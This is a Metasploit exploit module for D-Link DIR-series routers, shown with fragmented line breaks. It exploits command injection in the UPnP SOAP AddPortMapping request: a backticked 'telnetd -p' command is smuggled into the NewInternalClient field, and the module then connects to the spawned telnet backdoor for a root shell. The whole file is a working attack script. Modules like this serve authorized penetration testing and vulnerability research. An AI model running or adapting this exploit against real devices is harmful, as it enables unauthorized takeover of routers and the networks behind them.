require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'D-Link Devices UPnP SOAP Telnetd Command Execution'
,
'Description'
=> %q{
Various
D
-Link Routers are vulnerable to
OS
command injection
in
the UPnP
SOAP
interface. This
module
has been tested successfully on
DIR
-
300
,
DIR
-
600
,
DIR
-
645
,
DIR
-
845
and
DIR
-
865
. According to the vulnerability discoverer, more
D
-Link devices
may be affected.
},
'Author'
=>
[
'Michael Messner <devnull@s3cur1ty.de>'
,
'juan vazquez'
],
'License'
=>
MSF_LICENSE
,
'References'
=>
[
[
'OSVDB'
,
'94924'
],
[
'BID'
,
'61005'
],
[
'EDB'
,
'26664'
],
[
'URL'
,
'http://www.s3cur1ty.de/m1adv2013-020'
]
],
'DisclosureDate'
=>
'Jul 05 2013'
,
'Privileged'
=>
true
,
'Platform'
=>
'unix'
,
'Arch'
=>
ARCH_CMD
,
'Payload'
=>
{
'Compat'
=> {
'PayloadType'
=>
'cmd_interact'
,
'ConnectionType'
=>
'find'
,
},
},
'DefaultOptions'
=> {
'PAYLOAD'
=>
'cmd/unix/interact'
},
'Targets'
=>
[
[
'Automatic'
, { } ],
],
'DefaultTarget'
=>
0
))
register_options(
[
Opt::
RPORT
(
49152
)
],
self
.
class
)
register_advanced_options(
[
OptInt.
new
(
'TelnetTimeout'
, [
true
,
'The number of seconds to wait for a reply from a Telnet command'
,
10
]),
OptInt.
new
(
'TelnetBannerTimeout'
, [
true
,
'The number of seconds to wait for the initial banner'
,
25
])
],
self
.
class
)
end
def
tel_timeout
(datastore[
'TelnetTimeout'
] ||
10
).to_i
end
def
banner_timeout
(datastore[
'TelnetBannerTimeout'
] ||
25
).to_i
end
def
exploit
@new_portmapping_descr
= rand_text_alpha(
8
)
@new_external_port
= rand(
65535
)
@new_internal_port
= rand(
65535
)
telnetport = rand(
65535
)
vprint_status(
"#{rhost}:#{rport} - Telnetport: #{telnetport}"
)
cmd =
"telnetd -p #{telnetport}"
type =
"add"
res = request(cmd, type)
if
(!res
or
res.code !=
200
or
res.headers[
'Server'
].
nil
?
or
res.headers[
'Server'
] !~ /Linux\,\ UPnP\/
1
.
0
,\
DIR
/)
fail_with(Exploit::Failure::Unknown,
"#{rhost}:#{rport} - Unable to execute payload"
)
end
type =
"delete"
res = request(cmd, type)
if
(!res
or
res.code !=
200
or
res.headers[
'Server'
].
nil
?
or
res.headers[
'Server'
] !~ /Linux\,\ UPnP\/
1
.
0
,\
DIR
/)
fail_with(Exploit::Failure::Unknown,
"#{rhost}:#{rport} - Unable to execute payload"
)
end
print_status(
"#{rhost}:#{rport} - Trying to establish a telnet connection..."
)
sock = Rex::Socket.create_tcp({
'PeerHost'
=> rhost,
'PeerPort'
=> telnetport.to_i })
if
sock.
nil
?
fail_with(Exploit::Failure::Unreachable,
"#{rhost}:#{rport} - Backdoor service has not been spawned!!!"
)
end
print_status(
"#{rhost}:#{rport} - Trying to establish a telnet session..."
)
prompt = negotiate_telnet(sock)
if
prompt.
nil
?
sock.close
fail_with(Exploit::Failure::Unknown,
"#{rhost}:#{rport} - Unable to establish a telnet session"
)
else
print_good(
"#{rhost}:#{rport} - Telnet session successfully established..."
)
end
handler(sock)
end
def
request(cmd, type)
uri =
'/soap.cgi'
data_cmd =
"<?xml version=\"1.0\"?>"
data_cmd <<
"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
data_cmd <<
"<SOAP-ENV:Body>"
if
type ==
"add"
vprint_status(
"#{rhost}:#{rport} - adding portmapping"
)
soapaction =
"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
data_cmd <<
"<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd <<
"<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
data_cmd <<
"<NewLeaseDuration></NewLeaseDuration>"
data_cmd <<
"<NewInternalClient>`#{cmd}`</NewInternalClient>"
data_cmd <<
"<NewEnabled>1</NewEnabled>"
data_cmd <<
"<NewExternalPort>#{@new_external_port}</NewExternalPort>"
data_cmd <<
"<NewRemoteHost></NewRemoteHost>"
data_cmd <<
"<NewProtocol>TCP</NewProtocol>"
data_cmd <<
"<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
data_cmd <<
"</m:AddPortMapping>"
else
vprint_status(
"#{rhost}:#{rport} - deleting portmapping"
)
soapaction =
"urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
data_cmd <<
"<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
data_cmd <<
"<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
data_cmd <<
"</m:DeletePortMapping>"
end
data_cmd <<
"</SOAP-ENV:Body>"
data_cmd <<
"</SOAP-ENV:Envelope>"
begin
res = send_request_cgi({
'uri'
=> uri,
'vars_get'
=> {
'service'
=>
'WANIPConn1'
},
'ctype'
=>
"text/xml"
,
'method'
=>
'POST'
,
'headers'
=> {
'SOAPAction'
=> soapaction,
},
'data'
=> data_cmd
})
return
res
rescue
::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable,
"#{rhost}:#{rport} - Failed to connect to the web server"
)
end
end
def
negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout)
do
while
(
true
)
data = sock.get_once(-
1
, tel_timeout)
return
nil
if
not
data
or
data.length ==
0
if
data =~ /\x23\x20$/
return
true
end
end
end
rescue
::Timeout::Error
return
nil
end
end
end